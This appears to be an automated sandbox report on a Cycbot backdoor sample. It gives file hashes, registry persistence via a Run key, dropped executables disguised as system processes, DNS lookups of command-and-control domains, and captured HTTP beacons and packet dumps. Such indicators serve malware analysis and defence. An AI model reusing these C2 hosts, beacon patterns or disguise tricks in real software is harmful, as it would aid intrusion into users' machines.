Analysis Date2013-11-02 23:24:41
MD531231fcc4b004bb5b75d0978a298c940
SHA1ab93a05637691ce10a0505d3bdeeaf9500dd9831

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 72ab98e7c4c7a658c2ab79edc248efba sha1: bc2deea608cd26366ba6e092ab141969b07e858e size: 89600
Section.tls md5: 4bc19ac04ba9ddafafeecdb09e1c02bf sha1: 28b2abeedefe8ac220f2503fa3778a362680a26c size: 1024
Section.data md5: 538dcf7f998d4f7d2054618942d94018 sha1: 93c6240f95afa286905bc3341c84c3194b204d7e size: 77312
Section.reloc md5: e40120f64670a7823e0c9463472e98e0 sha1: 72b62e1af4bdb86c8c1ccf10d374d76dbf9e753f size: 1024
Timestamp2005-11-28 01:19:55
PEhash3fdd47400d3849888455f032cc504f7d02a880b4
AVavgBackDoor.Generic_r.TF
AVaviraBDS/Cycbot.BP

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝
C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Mutex{A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{1ACD3490-8843-47EB-867B-EDDDD7FA37FD}
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{6988405C-71C3-427c-975A-0398706E79EE}
Winsock DNSresetsystems-1.com
Winsock DNS127.0.0.1
Winsock DNSonlinedatingsecretfriends.com
Winsock DNShappyratatuy.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNSonlinedatingsecretfriends.com
Type: A
8.5.1.38
DNSzonedg.com
Type: A
141.101.115.20
DNSzonedg.com
Type: A
141.101.114.20
DNSzonedg.com
Type: A
190.93.246.20
DNSzonedg.com
Type: A
190.93.245.20
DNSzonedg.com
Type: A
190.93.244.20
DNSzonedg.com
Type: A
141.101.115.20
DNSzonedg.com
Type: A
141.101.114.20
DNSzonedg.com
Type: A
190.93.246.20
DNSzonedg.com
Type: A
190.93.245.20
DNSzonedg.com
Type: A
190.93.244.20
DNShappyratatuy.com
Type: A
DNSresetsystems-1.com
Type: A
HTTP GEThttp://onlinedatingsecretfriends.com/images/im133.jpg?v71=42&tq=gHZutDyMv5rJeiG1J8K%2B1MWCJbP4lltXIA%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxkX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxlKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxkX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJuX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP192.168.1.1:1031 ➝ 8.5.1.38:80
Flows TCP192.168.1.1:1033 ➝ 141.101.115.20:80
Flows TCP192.168.1.1:1034 ➝ 141.101.115.20:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   332e6a70 673f7637 313d3432 2674713d   3.jpg?v71=42&tq=
0x00000020 (00032)   67485a75 7444794d 7635724a 65694731   gHZutDyMv5rJeiG1
0x00000030 (00048)   4a384b25 3242314d 57434a62 50346c6c   J8K%2B1MWCJbP4ll
0x00000040 (00064)   74584941 25334425 33442048 5454502f   tXIA%3D%3D HTTP/
0x00000050 (00080)   312e300d 0a436f6e 6e656374 696f6e3a   1.0..Connection:
0x00000060 (00096)   20636c6f 73650d0a 486f7374 3a206f6e    close..Host: on
0x00000070 (00112)   6c696e65 64617469 6e677365 63726574   linedatingsecret
0x00000080 (00128)   66726965 6e64732e 636f6d0d 0a416363   friends.com..Acc
0x00000090 (00144)   6570743a 202a2f2a 0d0a5573 65722d41   ept: */*..User-A
0x000000a0 (00160)   67656e74 3a206d6f 7a696c6c 612f322e   gent: mozilla/2.
0x000000b0 (00176)   300d0a0d 0a                           0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   786b5825 32425039 68253242 49307344   xkX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 786c4b76 39373558   JuX%2BSNxlKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6564672e 636f6d0d   ost: zonedg.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000100 (00256)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000110 (00272)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000120 (00288)   57696e64 6f777320 4e542035 2e31290d   Windows NT 5.1).
0x00000130 (00304)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x00000140 (00320)   20300d0a 436f6e6e 65637469 6f6e3a20    0..Connection: 
0x00000150 (00336)   636c6f73 650d0a0d 0a                  close....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   786b5825 32425039 68253242 49307344   xkX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a75   OhLgjh88y%2BcoJu
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6564 672e636f 6d0d0a55   t: zonedg.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a3c 6872202f 3e0a2020   ose....<hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.


Strings
080904b0
1484
3.0.0.1
FileVersion
&No Exit  Shift+N
PrivateBuild
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
&Yes
'\*<*>
\0F rB
0h8T2h	'
0h#*bh
0hiKQhbh
{1'?08-3
?16:TA
1AWg G
1_Bh2h
[1Qph^M^
@1Ro`@^
1(t4|	
:2"":f
2h.'`hK
2h^PhRh
2L4okL
37/|Rh0ha
3Iv@h|
3p"fot!
)3urhS1
483Wmt
4GLO70
5Ph?cx'
#6EEI,
6>"hD_
76q<]N
7&#D+Xo1l
7j8uZC ho
7OZ"\;
(7^_^y"RF(e
;|$8*{
8@h2h!
#8	n^`
9"h#LN
9.@hphj
9RhaEa2h
9rhf h
9\TVh-
9zUgq?Ru
_a%+_|
A0VCo"
^+aAn^K
A&.;&g
A	gLtD
a^HW`h
A(iypnC(
A:oph]A/
awf~BU
b\cY!7!
	}\Bh=
Bh0hbh
Bh?,1*
bh?Ad h
=bh^)C
.bhd3s|
bhe|t9
bhhvBh"hph
}Bh`hVz
bh}h;YJ4
bhL=Rh
bhvx2h
bq_6fv
<byT"g
:C2h+@h
c;D]).
ce"hbhn
cHY~e=9
!'ClnM
CoGetMalloc
CoTaskMemFree
CRh! h
C|rhu4
-CT8T3bh3
CWfcL!
CWV7t<k
d3?x_o
;#;D5R
@.data
Dbh	4w
d@hL'_
D:nO{1
Do5h[h
DqQJ%x]
)D'r,x
!/<{&e
%"&,E(
[e$4qKe
E`h0h#Y
&e?@JiF
EnumResourceNamesA
EoC2hq
ePhf2h
eq7W]S
esrh}|w
/eXUph
 _"ey&?
ey";c/
fAyZBh
fbh;fy
FFS`h1
f\FYus hA
FindFirstFileA
FindFirstFileW
FindNextFileA
fM'g"h
FormatMessageW
fqZ"hum
F\s]Ph.&=
ftYgi$
f	U#oU
f!u)=S
f^X%'t
GetCalendarInfoA
GetCommandLineW
GetCurrentDirectoryW
GetModuleHandleW
GetProcessHeap
GlobalFree
&gS9r-r8
Gtrh7	
+GU,rh
G'?::v
gv%F}v	
G-x=w;
h;0h}rh&
h'0hrh
h0h=Z[
H[0S@Bx
h~&1je>
h4Y# hN
h5z^O.I
h6E&Abh
]`h&6V}
h_^8f[:4.
@hALrh
hbh0h{k
hbha1~
hbhfuC
@hbhm.
@hBho_W
h_Bht&"h
h[bh,U$
@h	cBh
h,crhaS
H;CrhL
HeapAlloc
HeapFree
hECW0hrh
heeOH%Fa
h[E@hK
hE$Ph?4
hF2hG@h
hfBhN?
h'fn(j
hFs30h
hFSRhl>
-+-`h|_g
<hGDI3
hgGph:`hM
h@h_</
h+'/"h
h@h0hRh,
"h@h.6
@h`h8u}
h"hE@h
h| h`haDES
hHk<k0h
`h"hVZH
h"hw)oC
hiG5I$
}`hiv>
"hIxt'
hJ`h7 h
 h^\k.
hkBh',
hK_q9Un
hKRh3bh
hlNL`h
hLsguX|
hLSM4z
h<+}]n
hNH-?yj/
`hnJI'
`h^o2h
h[ph?`h
hPh$k$U
hphVUm
hQse2h
H[$rh6
h>Rhbh
h:&'!T
`htS"h
| h^{U
 hu2hZ
hU4cRh
hU'>ERh
hUvZPh
hVUV'U
hWXmCq
hX0h+UY
"hx5W!aW
h)X7phL
;hxNk"6
h;XvU h5T)mE
^)`hy'
hyarh_
%H:{Yt0C)
hy~.UL
h<Z5`h
hz#_t$h-S
hzybh3
ibhYQ/
iEM|]k
)%	#IjFP
Ix(BhY
|\.IYy
J1_[Jhs
J|}+2h
:JF5Bhd]
<{JfV7
j`h&Ph8
J?qN/d]g
jQQ{L7
`,j(Z>
K9DKX 
,K.{bh
KERNEL32.dll
kF3Z~}
k#fLt%+V
kh2.dl
 ?KH+e
<kZd]1
l0hRh*=6RhRh[!f/
L1+bhc
L3TRu1G
LA6()z
_lclose
l&	$cx
_l@kM{
_llseek
LoadResource
LocalFree
LockResource
_lread
lRh.EA
lW_4q8
lWOrh#E>
_lwrite
m%<0~G
M2hQcV=
m2hy7;e
m`]Gbp
Ml[c{+
mmp^/F@
M(	nHd
MultiByteToWideChar
N2h0hN
N2hrhE\:
n/<aKX
NBhyBhd
	nbt'=
>N\d0h
%{]n@h;
+Njdj&
*ntVPY
$*>nzAo
NzrhEo|
O4M=Uq
Oe_LO)J
O@hPhHL
oILrh)
oJ<{<ur
ole32.dll
ooBK(v
O$p!c7
	oV=ypj	o
*o^WoB
oZ+4u}t7
%@O;Z5
P*aJlO
;PE+RyC
Ph6iBh
Ph&D8=
PhF}s-N
ph?;gH
ph@h$5
Ph+INd$n
PhNL,ph
phrh(5
phTG|+
pkYP3+y?
PPPPPP
ProgIDFromCLSID
P{Zvag
^Q0? "
Q2h\IW
,|qgRh
qM_$);q
Q.Q@hPh&
^QQJ&3!ukE
"+Q!|y
qZ~&Saj2
RaiseException
\RBT36
r#D*QN
R%`:EK
.reloc
'rg|a9
Rh0h@h
Rh5o,%
rh=#:7v
Rha7ZT`h
rh.dabhA
rh{DsEa8
rh;G@h
/Rh"h{\
\RhoU7sC
RhPhod
[RhRhDX,
Rh]}WC
RhxbhN
Rhy;v`h
\^\~RK5
RpcBindingFromStringBindingA
RPCRT4.dll
RpcStringBindingComposeA
RpcStringFreeA
rtpyePJ_
R'wy	g
rX_jh9
~r{zR"
+$}s7<l
SA8-.K
SalI@h&
SetLastError
*S% h-
S`h2hD
shg^6`h
SizeofResource
sphPhS
sqz	=L8
StringFromCLSID
T[#\Ct
TePhAI
tG2V_J&S
!This program cannot be run in DOS mode.
t`hZBh
TOWx.U
TVZ"hBh
%TX$Sw
t&YpW<
!U5*HG
/u.A!:}+
*@U.a*
U	$aye
UBi=^0j
UC'6a_H
u`h]s0hl}Rh
&uq`Qn
uwrh"h,
&u||X8=
*UXD@-
vA])ZK
vBh\7%
{=v_[L
VNg=$d
;W0h h
W.5BhT1
	w'8aJ
w`'9t$
~w]/br
<"@WOnrHi/
WRh&LH
(WRho^
))WSRh
#w=Um52o
<Wv7Y\
X0:mk_k
X'6PPq
x$Az/y
xc2hw+rh
|XeFWYl
Yc!H&V
!YDA',
y<%Jv&
!(yo@h
YU,4a5T
@yxk?v
zin?0{
Zmcv.A"
[ZO8~%
@*z!]z
zzV?uf